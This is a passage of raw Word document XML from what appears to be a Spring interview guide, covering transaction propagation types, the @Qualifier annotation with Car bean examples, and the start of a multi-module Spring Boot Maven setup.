        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ECA4E2C"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QUIRED (default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6225D0E3"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Joins an existing transaction or creates a new one if none exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="4278229C" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EBA4550"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QUIRES_NEW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B01E341"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uspends any existing transaction and creates a new one.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="3E9C6A69" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D48707"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NESTED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="154CCE8B"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reates a nested transaction within an existing transaction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="7C5C9B1F" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11AB15AA"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UPPORTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B6AD43A"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uns within a transaction if one exists, else runs without a transaction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="3FD3D2DB" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07B7DD64"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NOT_SUPPORTED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33B4F2D0"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uspends any existing transaction and runs without a transaction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="65AB035B" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C4CE55D"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NEVER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D07F766"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rows an exception if called within a transaction, only runs without one.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="4EF0887F" w14:textId="77777777" w:rsidTr="00910AE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CACAB46"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MANDATORY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="373387E1"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quires an existing transaction, throws an exception if none exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CB14E18" w14:textId="77777777" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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se propagation types give you fine-grained control over how transactions are managed in Spring. Depending on your business requirements, you can choose the appropriate propagation behavior to handle transaction boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012EA09" w14:textId="7A9AA4F9"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70C36B0">
          <v:rect id="_x0000_i2514" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31263ACE" w14:textId="0F1AD931" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D36B89">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="578" w:name="_Toc196308058"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What @Qualifier in spring? What is the use of @Qualifier</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="578"/>
    </w:p>
    <w:p w14:paraId="23AAF329" w14:textId="71FD99F4" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796"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 @Qualifier annotation in Spring is used to specify which bean should be injected when multiple beans of the same type are available in the Spring context. It is typically used in combination with @Autowired to help Spring resolve ambiguity when it needs to inject a specific bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703F22AA" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4121CB7E"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hen there are multiple beans of the same type in the Spring container, Spring will not know which one to inject. By using @Qualifier, you can explicitly specify which bean to inject by its name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488884CD" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B991F"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Assume you have two beans of type Car in the Spring context, and you want to inject a specific one into another bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0DFC46"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C93E43F"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Sedan implements Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7FE0F"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CA4FA0"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void drive() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575DA695"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System.out.println("Driving a sedan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECC8CD4"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48436DAB"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5DD30BFE" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047FE512"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39839631"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SUV implements Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825A78D"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27998638"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void drive() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BEDC73"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System.out.println("Driving an SUV");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001BF3E9"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4B68D3BD"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0F8FC5F1"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Now, you have a Driver class that depends on a Car:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A96CF8"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C62556"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Driver {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33931368"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Car car;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C5B58" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E28FB49"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353D01D4"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Qualifier("sedan")  // This resolves the ambiguity by specifying the bean name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007BE17C"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void setCar(Car car) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B85FFC1"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this.car = car;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB1614F"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05EF0302" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D5323B7"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void drive() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398E01F7"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car.drive();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EE3C72"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2991A17B"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52ECAAC6" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C604585" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2045"/>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lastRenderedPageBreak/>
        <w:t>The @Qualifier("sedan") annotation tells Spring to inject the Sedan bean into the Driver class, even though there are multiple Car beans (Sedan and SUV).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7457E61D" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2045"/>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 value inside @Qualifier must match the name of the bean that you want to inject. In this case, if Sedan is annotated with @Component("sedan"), Spring will use that name to resolve the dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B23EED4" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E2470" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2046"/>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esolving Ambiguity</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When there are multiple beans of the same type, @Qualifier helps resolve which specific bean should be injected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5418CC68" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2046"/>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ed with @Autowired</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use @Qualifier in combination with @Autowired on constructor injection, field injection, or setter injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566684F3" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796" w:rsidP="00D774B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2046"/>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Specifying Bean Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The value passed to @Qualifier should match the name of the bean you want to inject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36074FF2" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796"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 of Bean Name Customization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5192BF72"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mponent("sedan") // Custom name for the bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C74BAA"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Sedan implements Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE64AA"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4258B888"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void drive() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC0D06"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System.out.println("Driving a sedan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437C944B"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1D51D76B"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67C1D300"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n this case, the @Qualifier("sedan") will refer to the Sedan bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C88A82" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB4796"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55765918"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Qualifier is used to resolve ambiguity when multiple beans of the same type exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3844CC94"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t helps specify which bean should be injected into a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426921F5" w14:textId="77777777" w:rsidR="00AB4796" w:rsidRPr="00D774B4" w:rsidRDefault="00AB479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t is typically used with @Autowired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FF6F05" w14:textId="17B353B8"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51C3F40">
          <v:rect id="_x0000_i2515" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C86358" w14:textId="3D834875" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="007A67BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="579" w:name="_Toc196308059"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create multiple modules using spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="579"/>
    </w:p>
    <w:p w14:paraId="4A45636C" w14:textId="326B07B2" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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To create multiple modules using Spring Boot, you can organize your project into separate </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modules</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>submodules</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-module Maven/Gradle project</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each module can represent a specific piece of functionality, such as a service, controller, or data access layer. The modules will be part of a larger Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63040DA2" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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Step-by-Step Guide to Creating Multiple Modules with Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8BF32B" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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1. Create a Parent Maven Project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC8100"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First, create a parent project using Maven or Gradle. The parent project will contain the common configuration and dependencies for all submodules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEDC8AC"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Directory Structure Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16384913"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pring-boot-multi-module-project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08582889"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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>── pom.xml (Parent pom file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3917BFF3"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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>── module-api (Module for API layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2B9F3F"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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>── module-service (Module for service layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27892927"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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>── module-data (Module for data layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FC7AE8"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module-web (Module for web layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180409E6" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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2. Create Parent pom.xml for Maven Projects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFC7A71"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In the parent project (pom.xml), configure it as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent module</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that will manage dependencies, plugin versions, and shared configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2429B"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Example of parent pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF1EA09"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lt;project xmlns="http://maven.apache.org/POM/4.0.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC17D0"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xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491A5769"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xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298309D"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modelVersion&gt;4.0.0&lt;/modelVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738DA5DD" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C20FD48"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groupId&gt;com.example&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A17F82"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artifactId&gt;spring-boot-multi-module&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A57B97"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version&gt;1.0-SNAPSHOT&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35830FC5"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packaging&gt;pom&lt;/packaging&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000D016" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3B9576"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;modules&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE1B5EC"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module&gt;module-api&lt;/module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600CEF21"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module&gt;module-service&lt;/module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3EC15E"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module&gt;module-data&lt;/module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618D2111"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module&gt;module-web&lt;/module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A74FE"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modules&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A74317" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C584EC"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dependencyManagement&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E893B15"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dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AC7D4F"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 Spring Boot Dependencies --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FE9A9"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dependency&gt;</w:t>
      </w:r>
